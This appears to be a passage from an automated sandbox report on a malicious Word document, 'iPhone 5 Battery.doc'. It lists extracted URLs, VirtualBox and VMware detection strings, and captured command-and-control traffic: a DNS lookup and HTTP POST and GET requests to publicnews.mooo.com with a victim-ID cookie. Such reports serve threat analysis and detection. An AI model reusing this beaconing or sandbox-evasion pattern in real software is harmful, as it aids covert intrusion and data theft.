http://es.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search= WINWORD.EXE
http://esearch.rakuten.co.jp/ WINWORD.EXE
http://espanol.search.yahoo.com/ WINWORD.EXE
http://espn.go.com/favicon.ico WINWORD.EXE
http://find.joins.com/ WINWORD.EXE
http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/version_en_win_ax.xml rundll32.exe
http://fr.search.yahoo.com/ WINWORD.EXE
http://fr.wikipedia.org/ WINWORD.EXE
http://fr.wikipedia.org/favicon.ico WINWORD.EXE
http://fr.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search= WINWORD.EXE
http://go.microsoft.com/fwlink/?l WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=105563 WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=120347-http://go.microsoft.com/fwlink/?linkid=1203463read WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=120476 WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=121792 WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=122812hthe WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=124983 WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=12658 WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=12939 WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=134080)search WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=140502 WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=50462 WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=50893)lear&n WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=54537&clcid= WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=54729&clcid= WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=54758 WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=54796&clcid= WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=54896&clcid= WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=55027&clcid= WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=55028&clcid= WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=55107&clcid= WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=55242&clcid= WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=55245&clcid= WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=56297&clcid= WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=57427&protocol= WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=58472&clcid= WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=58473&clcid= WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=66725 WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=69157 WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=74005finternet WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=76277 WINWORD.EXE
http://go.microsoft.com/fwlink/?linkid=99193 WINWORD.EXE
http://google.pchome.com.tw/ WINWORD.EXE
http://home.altervista.org/ WINWORD.EXE
http://home.altervista.org/favicon.ico WINWORD.EXE
http://home.microsoft.com rundll32.exe
http://ie.search.yahoo.com/os?command= WINWORD.EXE
http://ie8.ebay.com/open-search/output-xml.php?q= WINWORD.EXE
http://image.excite.co.jp/jp/favicon/lep.ico WINWORD.EXE
http://images.joins.com/ui_c/fvc_joins.ico WINWORD.EXE
http://images.monster.com/favicon.ico WINWORD.EXE
http://img.atlas.cz/favicon.ico WINWORD.EXE
http://img.shopzilla.com/shopzilla/shopzilla.ico WINWORD.EXE
http://in.search.yahoo.com/ WINWORD.EXE
http://it.search.dada.net/ WINWORD.EXE
http://it.search.dada.net/favicon.ico WINWORD.EXE
http://it.search.yahoo.com/ WINWORD.EXE
http://it.wikipedia.org/ WINWORD.EXE
http://it.wikipedia.org/favicon.ico WINWORD.EXE
http://it.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search= WINWORD.EXE
http://ja.wikipedia.org/ WINWORD.EXE
http://ja.wikipedia.org/favicon.ico WINWORD.EXE
http://ja.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search= WINWORD.EXE
http://jobsearch.monster.com/ WINWORD.EXE
http://kr.search.yahoo.com/ WINWORD.EXE
http://list.taobao.com/ WINWORD.EXE
http://list.taobao.com/browse/search_visual.htm?n=15&amp;q= WINWORD.EXE
http://livesearch.msn.co.kr/ WINWORD.EXE
http://mail.live.com/ WINWORD.EXE
http://mail.live.com/?rru=compose%3fsubject%3d WINWORD.EXE
http://maps.live.com/ WINWORD.EXE
http://maps.live.com/default.aspx WINWORD.EXE
http://maps.live.com/geotager.aspx WINWORD.EXE
http://msdn.microsoft.com/ WINWORD.EXE
http://msdn.microsoft.com/workshop/security/privacy/overview/privacyimportxml.asp) WINWORD.EXE
http://msdn.microsoft.com/workshop/security/szone/overview/templates.asp) WINWORD.EXE
http://msk.afisha.ru/ WINWORD.EXE
http://nl.wikipedia.org/ WINWORD.EXE
http://nl.wikipedia.org/favicon.ico WINWORD.EXE
http://nl.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search= WINWORD.EXE
http://ns.adobe.com/exif/1.0/ WINWORD.EXE
http://ns.adobe.com/ix/1.0/ WINWORD.EXE
http://ns.adobe.com/pdf/1.3/ WINWORD.EXE
http://ns.adobe.com/photoshop/1.0/ WINWORD.EXE
http://ns.adobe.com/tiff/1.0/ WINWORD.EXE
http://ns.adobe.com/xap/1.0/ WINWORD.EXE
http://ns.adobe.com/xap/1.0/mm/ WINWORD.EXE
http://ocnsearch.goo.ne.jp/ WINWORD.EXE
http://office.bcentral.com/eservices/error?dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE, 6C3CF.dmp.dr
http://officeupdate.microsoft.com WINWORD.EXE, 6C3CF.dmp.dr
http://openimage.interpark.com/interpark.ico WINWORD.EXE
http://p.zhongsou.com/ WINWORD.EXE
http://p.zhongsou.com/favicon.ico WINWORD.EXE
http://pl.wikipedia.org/ WINWORD.EXE
http://pl.wikipedia.org/favicon.ico WINWORD.EXE
http://pl.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search= WINWORD.EXE
http://price.ru/ WINWORD.EXE
http://price.ru/favicon.ico WINWORD.EXE
http://pt.wikipedia.org/ WINWORD.EXE
http://pt.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search= WINWORD.EXE
http://publicnews.mooo.com/logo.gif rundll32.exe
http://publicnews.mooo.com/news.php?1221 rundll32.exe
http://purl.org/dc/elements/1.1 WINWORD.EXE, iPhone 5 Battery.doc
http://purl.org/dc/elements/1.1/ WINWORD.EXE
http://purl.org/rss/1.0/modules/content/ WINWORD.EXE
http://purl.org/rss/1.0/modules/slash/ WINWORD.EXE
http://rad.msn.com/msnperf/primedns.gif rundll32.exe
http://recherche.linternaute.com/ WINWORD.EXE
http://recherche.tf1.fr/ WINWORD.EXE
http://recherche.tf1.fr/favicon.ico WINWORD.EXE
http://rover.ebay.com WINWORD.EXE
http://ru.search.yahoo.com WINWORD.EXE
http://ru.wikipedia.org/ WINWORD.EXE
http://ru.wikipedia.org/favicon.ico WINWORD.EXE
http://ru.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search= WINWORD.EXE
http://sads.myspace.com/ WINWORD.EXE
http://schemas.microsoft.com/office/2004/12/omml WINWORD.EXE
http://schemas.microsoft.com/sharepoint/soap/directory/ 6C3CF.dmp.dr
http://schemas.xmlsoap.org/soap/envelope/ 6C3CF.dmp.dr
http://search-dyn.tiscali.it/ WINWORD.EXE
http://search.about.com/ WINWORD.EXE
http://search.alice.it/ WINWORD.EXE
http://search.alice.it/favicon.ico WINWORD.EXE
http://search.aol.com/ WINWORD.EXE
http://search.aol.in/ WINWORD.EXE
http://search.atlas.cz/ WINWORD.EXE
http://search.auction.co.kr/ WINWORD.EXE
http://search.auone.jp/ WINWORD.EXE
http://search.books.com.tw/ WINWORD.EXE
http://search.books.com.tw/favicon.ico WINWORD.EXE
http://search.centrum.cz/ WINWORD.EXE
http://search.centrum.cz/favicon.ico WINWORD.EXE
http://search.chol.com/ WINWORD.EXE
http://search.chol.com/favicon.ico WINWORD.EXE
http://search.cn.yahoo.com/ WINWORD.EXE
http://search.daum.net/ WINWORD.EXE
http://search.daum.net/favicon.ico WINWORD.EXE
http://search.dreamwiz.com/ WINWORD.EXE
http://search.dreamwiz.com/favicon.ico WINWORD.EXE
http://search.ebay.co.uk/ WINWORD.EXE
http://search.ebay.com/ WINWORD.EXE
http://search.ebay.com/favicon.ico WINWORD.EXE
http://search.ebay.de/ WINWORD.EXE
http://search.ebay.es/ WINWORD.EXE
http://search.ebay.fr/ WINWORD.EXE
http://search.ebay.in/ WINWORD.EXE
http://search.ebay.it/ WINWORD.EXE
http://search.empas.com/ WINWORD.EXE
http://search.empas.com/favicon.ico WINWORD.EXE
http://search.espn.go.com/ WINWORD.EXE
http://search.gamer.com.tw/ WINWORD.EXE
http://search.gamer.com.tw/favicon.ico WINWORD.EXE
http://search.gismeteo.ru/ WINWORD.EXE
http://search.goo.ne.jp/ WINWORD.EXE
http://search.goo.ne.jp/favicon.ico WINWORD.EXE
http://search.hanafos.com/ WINWORD.EXE
http://search.hanafos.com/favicon.ico WINWORD.EXE
http://search.interpark.com/ WINWORD.EXE
http://search.ipop.co.kr/ WINWORD.EXE
http://search.ipop.co.kr/favicon.ico WINWORD.EXE
http://search.live.com/results.aspx?form=iefm1&amp;q= WINWORD.EXE
http://search.live.com/results.aspx?form=so2tdf&amp;q= WINWORD.EXE
http://search.live.com/results.aspx?form=soltdf&amp;q= WINWORD.EXE
http://search.live.com/results.aspx?q= WINWORD.EXE
http://search.live.com/results.aspx?q=search&amp;form=hpdtdf WINWORD.EXE
http://search.live.com/results.aspx?q=search&amp;form=hpntdf WINWORD.EXE
http://search.livedoor.com/ WINWORD.EXE
http://search.livedoor.com/favicon.ico WINWORD.EXE
http://search.lycos.co.uk/ WINWORD.EXE
http://search.lycos.com/ WINWORD.EXE
http://search.lycos.com/favicon.ico WINWORD.EXE
http://search.microsoft.com/ WINWORD.EXE
http://search.msn.co.jp/results.aspx?q= WINWORD.EXE
http://search.msn.co.uk/results.aspx?q= WINWORD.EXE
http://search.msn.com.cn/results.aspx?q= WINWORD.EXE
http://search.msn.com/results.aspx?q= WINWORD.EXE
http://search.nate.com/ WINWORD.EXE
http://search.naver.com/ WINWORD.EXE
http://search.naver.com/favicon.ico WINWORD.EXE
http://search.nifty.com/ WINWORD.EXE
http://search.orange.co.uk/ WINWORD.EXE
http://search.orange.co.uk/favicon.ico WINWORD.EXE
http://search.rediff.com/ WINWORD.EXE
http://search.rediff.com/favicon.ico WINWORD.EXE
http://search.seznam.cz/ WINWORD.EXE
http://search.seznam.cz/favicon.ico WINWORD.EXE
http://search.sify.com/ WINWORD.EXE
http://search.yahoo.co.jp WINWORD.EXE
http://search.yahoo.co.jp/favicon.ico WINWORD.EXE
http://search.yahoo.com/ WINWORD.EXE
http://search.yahoo.com/favicon.ico WINWORD.EXE
http://search.yam.com/ WINWORD.EXE
http://search1.taobao.com/ WINWORD.EXE
http://search2.estadao.com.br/ WINWORD.EXE
http://searchresults.news.com.au/ WINWORD.EXE
http://service2.bfast.com/ WINWORD.EXE
http://si.wikipedia.org/ WINWORD.EXE
http://si.wikipedia.org/favicon.ico WINWORD.EXE
http://si.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search= WINWORD.EXE
http://sitesearch.timesonline.co.uk/ WINWORD.EXE
http://so-net.search.goo.ne.jp/ WINWORD.EXE
http://spaces.live.com/ WINWORD.EXE
http://spaces.live.com/blogit.aspx WINWORD.EXE
http://suche.aol.de/ WINWORD.EXE
http://suche.freenet.de/ WINWORD.EXE
http://suche.freenet.de/favicon.ico WINWORD.EXE
http://suche.lycos.de/ WINWORD.EXE
http://suche.t-online.de/ WINWORD.EXE
http://suche.web.de/ WINWORD.EXE
http://suche.web.de/favicon.ico WINWORD.EXE
http://support.microsoft.com WINWORD.EXE
http://techcrunch.com/2012/06/06/size-matters-supply-chain-whispers-hint-at-4-08-169-display-on-iphone-5/ iPhone 5.doc.dr
http://techcrunch.com/2012/06/11/apple-announces-ios-6-wwdc/ iPhone 5.doc.dr
http://techcrunch.com/2012/06/20/confirmed-the-new-iphone-will-have-a-19-pin-mini-conne WINWORD.EXE
http://techcrunch.com/2012/06/20/confirmed-the-new-iphone-will-have-a-19-pin-mini-connector/ iPhone 5.doc.dr
http://translator.live.com/?ref=ie8activity WINWORD.EXE
http://translator.live.com/bv.aspx?ref=ie8activity&amp;a= WINWORD.EXE
http://translator.live.com/bvprev.aspx?ref=ie8activity WINWORD.EXE
http://translator.live.com/default.aspx?ref=ie8activity WINWORD.EXE
http://translator.live.com/defaultprev.aspx?ref=ie8activity WINWORD.EXE
http://treyresearch.net WINWORD.EXE
http://tw.search.yahoo.com/ WINWORD.EXE
http://udn.com/ WINWORD.EXE
http://udn.com/favicon.ico WINWORD.EXE
http://uk.ask.com/ WINWORD.EXE
http://uk.ask.com/favicon.ico WINWORD.EXE
http://uk.search.yahoo.com/ WINWORD.EXE
http://vachercher.lycos.fr/ WINWORD.EXE
http://video.globo.com/ WINWORD.EXE
http://video.globo.com/favicon.ico WINWORD.EXE
http://web.ask.com/ WINWORD.EXE
http://wellformedweb.org/commentapi/ WINWORD.EXE
http://windowsupdate.microsoft.com WINWORD.EXE
http://www.abril.com.br/ WINWORD.EXE
http://www.abril.com.br/favicon.ico WINWORD.EXE
http://www.adobe.com/2006/flex/mx/internal iPhone 5 Battery.doc
http://www.adobe.com/products/flex WINWORD.EXE, iPhone 5 Battery.doc
http://www.afisha.ru/app_themes/default/images/favicon.ico WINWORD.EXE
http://www.alarabiya.net/ WINWORD.EXE
http://www.alarabiya.net/favicon.ico WINWORD.EXE
http://www.amazon.co.jp/ WINWORD.EXE
http://www.amazon.co.uk/ WINWORD.EXE
http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword= WINWORD.EXE
http://www.amazon.com/favicon.ico WINWORD.EXE
http://www.amazon.com/gp/search?ie=utf8&amp;tag=ie8search-20&amp;index=blended&amp;linkcode=qs&amp;camp=1789&amp;creative=9325&amp;keywords= WINWORD.EXE
http://www.amazon.de/ WINWORD.EXE
http://www.aol.com/favicon.ico WINWORD.EXE
http://www.arrakis.com/ WINWORD.EXE
http://www.arrakis.com/favicon.ico WINWORD.EXE
http://www.asharqalawsat.com/ WINWORD.EXE
http://www.asharqalawsat.com/favicon.ico WINWORD.EXE
http://www.ask.com/ WINWORD.EXE
http://www.auction.co.kr/auction.ico WINWORD.EXE
http://www.baidu.com/ WINWORD.EXE
http://www.baidu.com/favicon.ico WINWORD.EXE
http://www.bing.com/az/hprichbg?p=rb%2fmelonskin_en-us1533494814-d.jpg rundll32.exe
http://www.bing.com/fav rundll32.exe
http://www.bing.com/favicon.ico rundll32.exe
http://www.bing.com/fd/fb/r?v=8_07_0_1457099&sid=0 rundll32.exe
http://www.bing.com/fd/s/a/sw13.png rundll32.exe
http://www.bing.com/msnhomepagehistory.aspx?sid=549dec4b28164f7b802ae451620e3592&_=1343168347250 rundll32.exe
http://www.bing.com/partner/primedns.gif rundll32.exe
http://www.bing.com/s/as/1436447/en.js rundll32.exe
http://www.bing.com/sa/8_01_0_1462371/bubble_black.js rundll32.exe
http://www.bing.com/search?q=edmullen rundll32.exe
http://www.cdiscount.com/ WINWORD.EXE
http://www.cdiscount.com/favicon.ico WINWORD.EXE
http://www.ceneo.pl/ WINWORD.EXE
http://www.ceneo.pl/favicon.ico WINWORD.EXE
http://www.chennaionline.com/ncommon/images/collogo.ico WINWORD.EXE
http://www.cjmall.com/ WINWORD.EXE
http://www.cjmall.com/favicon.ico WINWORD.EXE
http://www.clarin.com/favicon.ico WINWORD.EXE
http://www.cnet.co.uk/ WINWORD.EXE
http://www.cnet.com/favicon.ico WINWORD.EXE
http://www.dailymail.co.uk/ WINWORD.EXE
http://www.dailymail.co.uk/favicon.ico WINWORD.EXE
http://www.etmall.com.tw/ WINWORD.EXE
http://www.etmall.com.tw/favicon.ico WINWORD.EXE
http://www.excite.co.jp/ WINWORD.EXE
http://www.expedia.com/ WINWORD.EXE
http://www.expedia.com/favicon.ico WINWORD.EXE
http://www.facebook.com/ WINWORD.EXE
http://www.facebook.com/favicon.ico WINWORD.EXE
http://www.gismeteo.ru/favicon.ico WINWORD.EXE
http://www.gmarket.co.kr/ WINWORD.EXE
http://www.gmarket.co.kr/favicon.ico WINWORD.EXE
http://www.google.co.in/ WINWORD.EXE
http://www.google.co.jp/ WINWORD.EXE
http://www.google.co.uk/ WINWORD.EXE
http://www.google.com.br/ WINWORD.EXE
http://www.google.com.sa/ WINWORD.EXE
http://www.google.com.tw/ WINWORD.EXE
http://www.google.com/ WINWORD.EXE
http://www.google.com/favicon.ico WINWORD.EXE
http://www.google.cz/ WINWORD.EXE
http://www.google.de/ WINWORD.EXE
http://www.google.es/ WINWORD.EXE
http://www.google.fr/ WINWORD.EXE
http://www.google.it/ WINWORD.EXE
http://www.google.pl/ WINWORD.EXE
http://www.google.ru/ WINWORD.EXE
http://www.google.si/ WINWORD.EXE
http://www.iask.com/ WINWORD.EXE
http://www.iask.com/favicon.ico WINWORD.EXE
http://www.kkbox.com.tw/ WINWORD.EXE
http://www.kkbox.com.tw/favicon.ico WINWORD.EXE
http://www.linternaute.com/favicon.ico WINWORD.EXE
http://www.live.com/favicon.ico WINWORD.EXE
http://www.macromedia.com WINWORD.EXE
http://www.maktoob.com/favicon.ico WINWORD.EXE
http://www.mercadolibre.com.mx/ WINWORD.EXE
http://www.mercadolibre.com.mx/favicon.ico WINWORD.EXE
http://www.mercadolivre.com.br/ WINWORD.EXE
http://www.mercadolivre.com.br/favicon.ico WINWORD.EXE
http://www.merlin.com.pl/ WINWORD.EXE
http://www.merlin.com.pl/favicon.ico WINWORD.EXE
http://www.microsoft.com/favicon.ico WINWORD.EXE
http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome rundll32.exe
http://www.microsoft.com/schemas/rss/core/2005/internal WINWORD.EXE
http://www.microsoft.com/windowsxp/expertzone/ WINWORD.EXE
http://www.msn.com rundll32.exe
http://www.mtv.com/ WINWORD.EXE
http://www.mtv.com/favicon.ico WINWORD.EXE
http://www.myspace.com/favicon.ico WINWORD.EXE
http://www.najdi.si/ WINWORD.EXE
http://www.najdi.si/favicon.ico WINWORD.EXE
http://www.nate.com/favicon.ico WINWORD.EXE
http://www.neckermann.de/ WINWORD.EXE
http://www.neckermann.de/favicon.ico WINWORD.EXE
http://www.news.com.au/favicon.ico WINWORD.EXE
http://www.nifty.com/favicon.ico WINWORD.EXE
http://www.ocn.ne.jp/favicon.ico WINWORD.EXE
http://www.orange.fr/ WINWORD.EXE
http://www.otto.de/favicon.ico WINWORD.EXE
http://www.ozon.ru/ WINWORD.EXE
http://www.ozon.ru/favicon.ico WINWORD.EXE
http://www.ozu.es/favicon.ico WINWORD.EXE
http://www.paginasamarillas.es/ WINWORD.EXE
http://www.paginasamarillas.es/favicon.ico WINWORD.EXE
http://www.pchome.com.tw/favicon.ico WINWORD.EXE
http://www.priceminister.com/ WINWORD.EXE
http://www.priceminister.com/favicon.ico WINWORD.EXE
http://www.rakuten.co.jp/favicon.ico WINWORD.EXE
http://www.rambler.ru/ WINWORD.EXE
http://www.rambler.ru/favicon.ico WINWORD.EXE
http://www.recherche.aol.fr/ WINWORD.EXE
http://www.rtl.de/ WINWORD.EXE
http://www.rtl.de/favicon.ico WINWORD.EXE
http://www.servicios.clarin.com/ WINWORD.EXE
http://www.shopzilla.com/ WINWORD.EXE
http://www.sify.com/favicon.ico WINWORD.EXE
http://www.so-net.ne.jp/share/favicon.ico WINWORD.EXE
http://www.sogou.com/ WINWORD.EXE
http://www.sogou.com/favicon.ico WINWORD.EXE
http://www.soso.com/ WINWORD.EXE
http://www.soso.com/favicon.ico WINWORD.EXE
http://www.t-online.de/favicon.ico WINWORD.EXE
http://www.taobao.com/ WINWORD.EXE
http://www.taobao.com/favicon.ico WINWORD.EXE
http://www.target.com/ WINWORD.EXE
http://www.target.com/favicon.ico WINWORD.EXE
http://www.tchibo.de/ WINWORD.EXE
http://www.tchibo.de/favicon.ico WINWORD.EXE
http://www.tesco.com/ WINWORD.EXE
http://www.tesco.com/favicon.ico WINWORD.EXE
http://www.timesonline.co.uk/img/favicon.ico WINWORD.EXE
http://www.tiscali.it/favicon.ico WINWORD.EXE
http://www.typodermic.com iPhone 5 Battery.doc
http://www.univision.com/ WINWORD.EXE
http://www.univision.com/favicon.ico WINWORD.EXE
http://www.w3.org/1999/02/22-rdf-syntax-ns# WINWORD.EXE, iPhone 5 Battery.doc
http://www.w3.org/1999/xhtml WINWORD.EXE
http://www.w3.org/1999/xsl/transform WINWORD.EXE
http://www.w3.org/2001/xmlschema 6C3CF.dmp.dr
http://www.w3.org/2001/xmlschema-instance 6C3CF.dmp.dr
http://www.w3.org/tr/html4/loose.dtd WINWORD.EXE
http://www.w3.org/tr/html4/strict.dtd WINWORD.EXE
http://www.w3.org/tr/html401/strict.dtd WINWORD.EXE
http://www.w3.org/tr/rec-html40/strict.dtd WINWORD.EXE
http://www.w3.org/tr/wd-xsl WINWORD.EXE
http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd WINWORD.EXE
http://www.walmart.com/ WINWORD.EXE
http://www.walmart.com/favicon.ico WINWORD.EXE
http://www.weather.com/ WINWORD.EXE
http://www.weather.com/favicon.ico WINWORD.EXE
http://www.ya.com/favicon.ico WINWORD.EXE
http://www.yam.com/favicon.ico WINWORD.EXE
http://www.yandex.ru/ WINWORD.EXE
http://www.yandex.ru/favicon.ico WINWORD.EXE
http://www3.fnac.com/ WINWORD.EXE
http://www3.fnac.com/favicon.ico WINWORD.EXE
http://xml-us.amznxslt.com/onca/xml?service=awsecommerceservice&amp;version=2008-06-26&amp;operation=itemsearch&amp;awsaccesskeyid=15hrv3azsmpk0gxty102&amp;associatetag=ie8suggestion-20&amp;responsegroup=itemattributes WINWORD.EXE
http://yellowpages.superpages.com/ WINWORD.EXE
http://z.about.com/m/a08.ico WINWORD.EXE
https://example.com WINWORD.EXE
https://ieonlinews.microsoft.com/ WINWORD.EXE
https://office.bcentral.com/eservices/index?dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE, 6C3CF.dmp.dr
https://office.bcentral.com/eservices/service?command=webpost&dpc=%productcode%&dcc=%appcomponentcode%&appname=%applicationname%&clcid=%uilang%&helplcid=%helplang% WINWORD.EXE, 6C3CF.dmp.dr
Social media names
String value Source
<SuggestionsURL>http://ie.search.yahoo.com/os?command={SearchTerms}</SuggestionsURL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<FavoriteIcon>http://search.yahoo.co.jp/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo) WINWORD.EXE
<FavoriteIcon>http://search.yahoo.com/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo) WINWORD.EXE
<FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook) WINWORD.EXE
<FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace) WINWORD.EXE
<FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler) WINWORD.EXE
<URL>http://br.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://de.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://es.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://espanol.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://fr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://in.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://it.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://kr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://ru.search.yahoo.com</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://sads.myspace.com/</URL> equals www.myspace.com (Myspace) WINWORD.EXE
<URL>http://search.cn.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://search.yahoo.co.jp</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://tw.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://uk.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo) WINWORD.EXE
<URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook) WINWORD.EXE
<URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler) WINWORD.EXE
Free Hotmail.url equals www.hotmail.com (Hotmail) WINWORD.EXE
VM Artifacts
String value Source
ROOT\LEGACY_VBOXSF\0000 svchost.exe
SCSI\DISK&VEN_VMWARE_&PROD_VMWARE_VIRTUAL_S&REV_1 svchost.exe
ROOT\LEGACY_VMHGFS\0000 svchost.exe
ROOT\LEGACY_VMWAREAUTH\0000 svchost.exe
IDE\CDROMNECVMWAR_VMWARE_IDE_CDR10_______________1.00____\3031303030303030303030303030303030303130 svchost.exe
SCSI\DISK&VEN_VMWARE_&PROD_VMWARE_VIRTUAL_S&REV_1.0\4&5FCAAFC&1&000 svchost.exe

Network Behavior
TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Aug 16, 2012 14:35:29.080504894 CEST 1099 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:29.080528021 CEST 80 1099 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:29.080727100 CEST 1099 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:29.087272882 CEST 1099 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:29.087289095 CEST 80 1099 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:47.000443935 CEST 80 1099 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:47.000756025 CEST 1099 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:47.001743078 CEST 1099 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:47.001756907 CEST 80 1099 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:47.008352995 CEST 1100 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:47.008384943 CEST 80 1100 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:47.008574963 CEST 1100 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:47.010173082 CEST 1100 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:47.010190964 CEST 80 1100 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:55.003201008 CEST 80 1100 108.171.240.86 192.168.0.11
Aug 16, 2012 14:35:55.003520966 CEST 1100 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:55.004192114 CEST 1100 80 192.168.0.11 108.171.240.86
Aug 16, 2012 14:35:55.004208088 CEST 80 1100 108.171.240.86 192.168.0.11
UDP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Aug 16, 2012 14:35:29.035233974 CEST 55604 53 192.168.0.11 195.186.1.121
Aug 16, 2012 14:35:29.035330057 CEST 53 55604 195.186.1.121 192.168.0.11
DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Aug 16, 2012 14:35:29.035233974 CEST 192.168.0.11 195.186.1.121 0x55cb Standard query (0) publicnews.mooo.com A (IP address) IN (0x0001)
DNS Answers
Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class
Aug 16, 2012 14:35:29.035330057 CEST 195.186.1.121 192.168.0.11 0x55cb No error (0) publicnews.mooo.com 108.171.240.86 A (IP address) IN (0x0001)
HTTP Request Dependency Graph
  • publicnews.mooo.com
HTTP Packets
Timestamp Source Port Dest Port Source IP Dest IP Header Total Bytes Transfered (KB)
Aug 16, 2012 14:35:29.087272882 CEST 1099 80 192.168.0.11 108.171.240.86 POST /news.php?1221 HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: publicnews.mooo.com
Content-Length: 89
Cache-Control: no-cache
 0
Aug 16, 2012 14:35:47.010173082 CEST 1100 80 192.168.0.11 108.171.240.86 GET /logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: publicnews.mooo.com
Cache-Control: no-cache
Cookie: mid=14D7C316078BFBFF00600F12
 1

Code Manipulation Behavior

System Behavior

Analysis File: WINWORD.EXE PID: 1160 Parent PID: 1884

General
Start time: 15:20:04
Start date: 24/07/2012
Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
Wow64 process (32bit): false
Commandline: unknown
Imagebase: 0x30000000
File size: 12310368 bytes
MD5 hash: 443747857245BF90847AE396C53470A6

File Activites
File Path Access Options Content overwritten Completion Count Source Address Symbol
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.Word read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident success or wait 1 3017FDAF CreateDirectoryW
